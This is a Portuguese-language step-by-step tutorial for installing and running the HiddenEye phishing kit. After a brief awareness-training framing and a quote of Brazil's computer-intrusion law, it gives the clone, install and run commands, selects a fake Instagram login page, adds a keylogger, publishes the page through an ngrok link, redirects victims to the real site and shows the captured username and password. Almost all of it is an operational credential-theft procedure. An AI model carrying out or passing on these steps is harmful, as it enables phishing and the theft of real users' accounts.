O Hidden Eye é uma plataforma de phishing que pode ser utilizada em um programa de conscientização sobre segurança da informação, porém também pode ser utilizada por pessoas mal intencionadas.
Projeto : github.com/DarkSecDevelopers/HiddenEye
Como previsto na Lei 12.737/2012 no Art. 154-A. Invadir dispositivo informático alheio, conectado ou não à rede de computadores, mediante violação indevida de mecanismo de segurança e com o fim de obter, adulterar ou destruir dados ou informações sem autorização expressa ou tácita do titular do dispositivo ou instalar vulnerabilidades para obter vantagem ilícita:
Pena – detenção, de 3 (três) meses a 1 (um) ano, e multa.(Lei Nº 12.737, de 30 de novembro de 2012).
Realize o download do Hidden Eye e liste o conteúdo do diretório:
Linuxgit clone https://github.com/TermuxHackz/HiddenEye cd HiddenEye/ ls
Realize a instalação dos pré-requisitos para o funcionamento do Hidden Eye.
Linuxpip3 install -r requirements.txt
Atribua a permissão de execução no script HiddenEye.py.
Linuxchmod +x HiddenEye.py
Execute o script HiddenEye.py.
Linux./HiddenEye.py Em seguida responda a pergunta: y = Sim, n = Não Você concorda em usar essa ferramenta apenas para fins educacionais? (y / n) HiddenEye >>> y
Informe qual o modelo de phishing que você deseja utilizar.
LinuxHiddenEye >>>
Para este exemplo optei em utilizar o modelo do [ 8 ] Instagram.
LinuxHiddenEye >>> 8
Selecione um modo de operação.
Para este exemplo estou utilizando o modo padrão :
Linux[ 1 ] Standard Instagram Web Page Phishing HiddenEye >>> 1
Você pode adicionar um Keylogger na página :
LinuxVOCÊ QUER ADICIONAR UM KEYLOGGER NA PÁGINA DE PHISHING – (Y/N) YOUR CHOICE >>> Y
Você deve informar um site para customizar o redirecionamento após a vítima inserir os dados.
LinuxREDIRECT HERE>>> www.instagram.com
Seleciona um dos servidores disponíveis, Ngrok ou Serveo.
Linux[1]Ngrok [2]Serveo HiddenEye >>> 1
O servidor foi inciado e o endereço do phishing foi gerado:
Linuxhttps://5465aea9.ngrok.io
Assim que o usuário acessa o link: https://5465aea9.ngrok.io ele visualiza uma página falsa do Instagram.
Assim que a vítima preencher os campos do formulário os dados serão enviados para o atacante.
Como definido no passo 09 após preencher o formulário de login a vítima é redirecionada para o site oficial do Instagram (www.instagram.com).
Como pode ver os dados digitados no formulário são exibidos para o atacante.
Usuário : 100security
Senha : P@ssw0rd